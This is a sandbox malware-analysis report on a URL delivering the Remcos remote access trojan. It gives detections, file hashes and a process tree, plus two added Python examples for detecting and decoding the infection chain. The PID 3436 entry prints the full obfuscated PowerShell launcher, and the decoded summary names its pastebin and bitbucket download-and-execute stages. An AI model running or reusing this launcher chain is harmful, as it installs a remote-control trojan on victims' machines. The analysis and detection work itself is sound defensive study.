URL:

http://asegurar4octubre.duckdns.org/

Full analysis: https://app.any.run/tasks/7168f369-26d3-4d24-90a6-5ff2915559d2
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a class of malware that gives an attacker partial to complete control over an infected computer. They are often modular, offering a wide range of functions for illicit activity on the compromised system; common capabilities include access to the user's files, webcam and keystrokes. RATs are typically delivered through phishing emails and links.

Analysis date: February 18, 2025, 22:39:08
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
opendir
pastebin
remcos
rat
remote
Indicators:
MD5:

B0D46E6BAC9BA141B02FA729CBCA9FB2

SHA1:

9AF35A62922839FE032297840E29835E514CC993

SHA256:

6A274E5CD585E56E7367001314EBAE6C1CD3C3F9E470AD5F1AAF108E618A5358

SSDEEP:

3:N1KfiCEwQ1IWin:CjEj1IWi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3420)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3436)
    • REMCOS mutex has been found

      • MSBuild.exe (PID: 5244)
    • REMCOS has been detected (SURICATA)

      • MSBuild.exe (PID: 5244)
    • REMCOS has been detected

      • MSBuild.exe (PID: 5244)
      • MSBuild.exe (PID: 5244)
    • REMCOS has been detected (YARA)

      • MSBuild.exe (PID: 5244)
  • SUSPICIOUS

    • Block-list domains

      • msedge.exe (PID: 7108)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 3420)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 4992)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 4992)
      • powershell.exe (PID: 3436)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 4992)
      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 3436)
    • Application launched itself

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)
    • The process executes Powershell scripts

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 5916)
    • Probably download files using WebClient

      • powershell.exe (PID: 3436)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3420)
    • Contacting a server suspected of hosting an CnC

      • MSBuild.exe (PID: 5244)
    • Connects to unusual port

      • MSBuild.exe (PID: 5244)
    • Reads security settings of Internet Explorer

      • MSBuild.exe (PID: 5244)
    • There is functionality for taking screenshot (YARA)

      • MSBuild.exe (PID: 5244)
  • INFO

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 3436)
      • powershell.exe (PID: 3420)
    • Manual execution by a user

      • wscript.exe (PID: 4992)
      • notepad++.exe (PID: 7668)
      • notepad++.exe (PID: 5936)
    • Checks supported languages

      • identity_helper.exe (PID: 8084)
      • MSBuild.exe (PID: 5244)
    • Reads the computer name

      • identity_helper.exe (PID: 8084)
      • MSBuild.exe (PID: 5244)
    • Reads Environment values

      • identity_helper.exe (PID: 8084)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 3436)
    • Application launched itself

      • msedge.exe (PID: 6864)
    • Checks proxy server information

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3420)
      • MSBuild.exe (PID: 5244)
    • Disables trace logs

      • powershell.exe (PID: 5916)
      • powershell.exe (PID: 3420)
    • Creates files or folders in the user directory

      • MSBuild.exe (PID: 5244)
    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 5244)
    • Creates files in the program directory

      • MSBuild.exe (PID: 5244)
    • The sample compiled with english language support

      • msedge.exe (PID: 7624)
    • Executable content was dropped or overwritten

      • msedge.exe (PID: 7624)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
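The signatures above describe one chain: a script host (wscript.exe) starts PowerShell, that PowerShell carries a base64 blob with a glyph substituted for 'A' and decodes it with FromBase64String(...replace(...)), a further PowerShell runs -ExecutionPolicy Bypass -File on a script under %TEMP%, and MSBuild.exe ends up talking to the network with REMCOS inside it. The Python below is an added example, not part of the ANY.RUN report: it turns those four observations into checks over a constructed, simplified process-tree sample shaped after this report's PIDs. The parent links below PID 3436, the MSBuild.exe command line and the 203.0.113.5 destination in the sample are assumptions made for the example; the report does not list them.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    ppid: int
    net: list = field(default_factory=list)  # outbound ip:port observed for this process


# Constructed sample shaped after this report's tree. Parent links below 3436,
# the MSBuild command line and the destination address are assumptions for the
# example; the report itself does not show them.
EVENTS = [
    Proc(4992, "wscript.exe", r'"C:\Windows\System32\wscript.exe" "C:\Users\admin\Downloads\sostener2.vbs"', 7668),
    Proc(3436, "powershell.exe",
         "powershell.exe $IuJUJJZz = '" + "WwBT★Hk★cwB0★GU★" * 20 + "';"
         "$x = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( "
         "$IuJUJJZz.replace('★','A') ) );powershell $x", 4992),
    Proc(5916, "powershell.exe", "powershell [System.Net.ServicePointManager]::SecurityProtocol = "
         "[System.Net.SecurityProtocolType]::Tls12; ...", 3436),
    Proc(3420, "powershell.exe", r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Local\Temp\dll03.ps1', 5916),
    Proc(5244, "MSBuild.exe", r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe', 3420, ["203.0.113.5:65500"]),
    # a benign-looking admin invocation that should stay quiet
    Proc(9001, "powershell.exe", r'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\build.ps1', 9000),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOTNET_LOLBINS = {"msbuild.exe", "installutil.exe", "regasm.exe", "regsvcs.exe"}
# FromBase64String( ... .replace('<glyph>','<one base64 char>') ): a substitution undone just before decoding
GLYPH_SUB = re.compile(r"FromBase64String\(.*?\.replace\('([^']+)',\s*'[A-Za-z0-9+/]'\)", re.S)
LONG_LITERAL = re.compile(r"'([^']{200,})'")
TEMP_PS1 = re.compile(r'-File\s+"?[^"\s]*\\AppData\\Local\\Temp\\[^"\s]+\.ps1', re.I)


def ancestors(pid, by_pid):
    """Walk parent links upward, stopping at the first PID we have no record for."""
    out, p = [], by_pid.get(pid)
    while p is not None and p.ppid in by_pid:
        p = by_pid[p.ppid]
        out.append(p)
    return out


def check(events):
    """Return {pid: [reasons]} for processes matching the chain seen in this report."""
    by_pid = {e.pid: e for e in events}
    findings = {}

    def flag(pid, why):
        findings.setdefault(pid, []).append(why)

    for e in events:
        img = e.image.lower()
        parent = by_pid.get(e.ppid)
        if img == "powershell.exe":
            if parent and parent.image.lower() in SCRIPT_HOSTS:
                flag(e.pid, f"spawned by script host {parent.image}")
            sub, lit = GLYPH_SUB.search(e.cmdline), LONG_LITERAL.search(e.cmdline)
            if sub and lit and sub.group(1) in lit.group(1):
                flag(e.pid, f"base64 payload with glyph {sub.group(1)!r} substituted before decoding")
            if "-executionpolicy bypass" in e.cmdline.lower() and TEMP_PS1.search(e.cmdline):
                flag(e.pid, "ExecutionPolicy Bypass on a script in %TEMP%")
        if img in DOTNET_LOLBINS and e.net:
            if any(a.image.lower() == "powershell.exe" for a in ancestors(e.pid, by_pid)):
                flag(e.pid, f"{e.image} under PowerShell with outbound {', '.join(e.net)}")
    return findings


if __name__ == "__main__":
    for pid, reasons in sorted(check(EVENTS).items()):
        print(pid, *reasons, sep="\n    ")
```

The glyph check is the most specific of the four: a legitimate `FromBase64String` call has no reason to `.replace()` a non-base64 character into 'A' first, whereas `-ExecutionPolicy Bypass -File` on its own (PID 9001 in the sample) is common in administration and is only flagged here when the script lives under %TEMP%.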
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
177
Monitored processes
51
Malicious processes
6
Suspicious processes
1

Behavior graph

Processes in the graph, in the order shown ("no specs" marks processes with no matched signatures): iexplore.exe (no specs), msedge.exe, msedge.exe (no specs) ×2, msedge.exe, svchost.exe, msedge.exe (no specs) ×5, identity_helper.exe (no specs) ×2, msedge.exe (no specs) ×13, rundll32.exe (no specs), notepad++.exe, msedge.exe (no specs) ×2, wscript.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), powershell.exe, powershell.exe, msbuild.exe (no specs), msbuild.exe (#REMCOS), notepad++.exe, msedge.exe (no specs) ×10, msedge.exe, msedge.exe (no specs) ×3.

The infection chain in this graph is wscript.exe (PID 4992) → powershell.exe (PID 3436) → powershell.exe (PID 5916) → powershell.exe (PID 3420, dll03.ps1), ending in msbuild.exe (PID 5244), where REMCOS is detected.

Process information

PID
CMD
Path
Indicators
Parent process
PID: 644
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5812 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2192
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2676
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6368 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2904
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4940 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3420
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Local\Temp\dll03.ps1
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 3436
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★FQ★ZQBo★HU★b★Bj★Gg★ZQBz★Fg★e★BY★Hg★e★★u★EM★b★Bh★HM★cw★x★Cc★Jw★g★Ck★LgBH★GU★d★BN★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBl★HQ★a★Bv★GQ★K★★g★Cc★JwBN★HM★cQBC★Ek★YgBZ★Cc★Jw★g★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★C★★J★Bu★HU★b★Bs★C★★L★★g★Fs★bwBi★Go★ZQBj★HQ★WwBd★F0★I★★o★C★★Jw★n★HQ★e★B0★C4★NQ★y★D★★MgBm★GY★ZQB0★HM★bwBz★C8★cwBk★GE★bwBs★G4★dwBv★GQ★LwBy★GU★bgBl★HQ★cwBv★HM★Mw★y★DE★Lw★x★GU★cgBy★G8★d★Bj★GU★a★★v★Gc★cgBv★C4★d★Bl★Gs★YwB1★GI★d★Bp★GI★Lw★v★Do★cwBw★HQ★d★Bo★Cc★Jw★g★Cw★I★★n★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★Cc★I★★s★C★★Jw★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★Xw★t★C0★LQ★t★C0★LQ★t★Cc★Jw★s★C★★Jw★n★D★★Jw★n★Cw★I★★n★Cc★MQ★n★Cc★L★★g★Cc★JwBS★G8★Z★Bh★Cc★Jw★g★C★★KQ★g★Ck★I★★7★Cc★I★★7★CQ★VgBC★Fc★VwB6★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★z★C4★c★Bz★DE★Jw★g★Ck★I★★7★CQ★TQBP★EQ★UgBn★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BW★EI★VwBX★Ho★I★★g★C0★ZgBv★HI★YwBl★C★★OwBw★G8★dwBl★HI★cwBo★GU★b★Bs★C★★LQBF★Hg★ZQBj★HU★d★Bp★G8★bgBQ★G8★b★Bp★GM★eQ★g★EI★eQBw★GE★cwBz★C★★LQBG★Gk★b★Bl★C★★J★BW★EI★VwBX★Ho★I★★7★★==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\admin\Downloads\sostener2.vbs');powershell $Yolopolhggobek;
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
Decoded content (★ → A, base64, UTF-16LE; worked out from the command line above, not a separate field of the report): the script forces TLS 1.2, downloads https://pastebin.com/raw/pzXGkayU to %TEMP%\dll01.txt, downloads the URL contained in that file to %TEMP%\dll02.txt, then writes %TEMP%\dll03.ps1, which base64-decodes dll02.txt after replacing '$$$' with 'A', loads the result with [System.AppDomain]::CurrentDomain.Load, and invokes TehulchesXxXxx.Class1.MsqBIbY with arguments including the backwards string 'txt.5202ffetsos/sdaolnwod/renetsos321/1errotceh/gro.tekcubtib//:sptth' (https://bitbucket.org/hectorre1/123sostener/downloads/sosteff2025.txt read in reverse) and the VBS path substituted for %JkQasDfgrTg%. It finishes with powershell -ExecutionPolicy Bypass -File dll03.ps1, which is PID 3420 above.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3464
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4176 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3876
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6684 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4008
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=796 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4504
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4232 --field-trial-handle=2420,i,3145728529689868577,8904705129187573045,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
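The PID 3436 command line in the table above is the launcher for the whole chain: a UTF-16LE PowerShell script, base64-encoded, with every 'A' replaced by '★', and a '%JkQasDfgrTg%' placeholder swapped for the VBS path just before the child powershell runs it. The Python below is an added example, not part of the ANY.RUN report, that reverses a launcher of that shape generically: it pulls the long quoted literal and the .replace() pairs out of a command line, applies the first substitution before base64/UTF-16LE decoding and the remaining ones after, and also un-reverses any string literal written backwards the way the third-stage URL in this sample is. The command line it runs on is constructed for the example (a made-up inner script with an example.invalid URL, wrapped exactly as the real launcher wraps its payload) so that it can be checked offline; feed `decode_launcher` the real command line from the table to recover the actual script.

```python
import base64
import re

# --- constructed sample in the shape of the PID 3436 launcher (not the real payload) ---
INNER_SCRIPT = ("$u = 'txt.2egats/dilavni.elpmaxe//:sptth';"   # a URL typed backwards, as in stage 3
                "Start-Process '%JkQasDfgrTg%'")                # placeholder the launcher fills in


def obfuscate(script: str, glyph: str = "★") -> str:
    """Encode the way the launcher expects: UTF-16LE -> base64 -> every 'A' becomes the glyph."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii").replace("A", glyph)


SAMPLE_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "$IuJUJJZz = '" + obfuscate(INNER_SCRIPT) + "';"
    "$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( "
    "[system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );"
    "$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', "
    "'C:\\Users\\admin\\Downloads\\sostener2.vbs');powershell $Yolopolhggobek;"
)

LONG_LITERAL = re.compile(r"=\s*'([^']{64,})'")                 # first long single-quoted literal
REPLACE_CALL = re.compile(r"\.replace\('([^']*)',\s*'([^']*)'\)")
REVERSED_URL = re.compile(r"'([^']*//:s?ptth)'")                # 'http://' or 'https://' spelled backwards


def decode_launcher(cmdline: str) -> str:
    """Recover the script that a launcher of this shape hands to the child powershell."""
    literal = LONG_LITERAL.search(cmdline)
    subs = REPLACE_CALL.findall(cmdline)
    if not literal or not subs:
        raise ValueError("command line does not look like this launcher")
    blob = literal.group(1)
    old, new = subs[0]                        # the first .replace() runs before FromBase64String
    blob = blob.replace(old, new)
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    script = raw.decode("utf-16-le")          # [Text.Encoding]::Unicode is UTF-16LE
    for old, new in subs[1:]:                 # later .replace() calls run on the decoded text
        script = script.replace(old, new)
    return script


def reveal_reversed_urls(script: str) -> list:
    """Return every backwards URL literal in the script, reversed back into a readable URL."""
    return [m[::-1] for m in REVERSED_URL.findall(script)]


if __name__ == "__main__":
    decoded = decode_launcher(SAMPLE_CMDLINE)
    print(decoded)
    print(reveal_reversed_urls(decoded))
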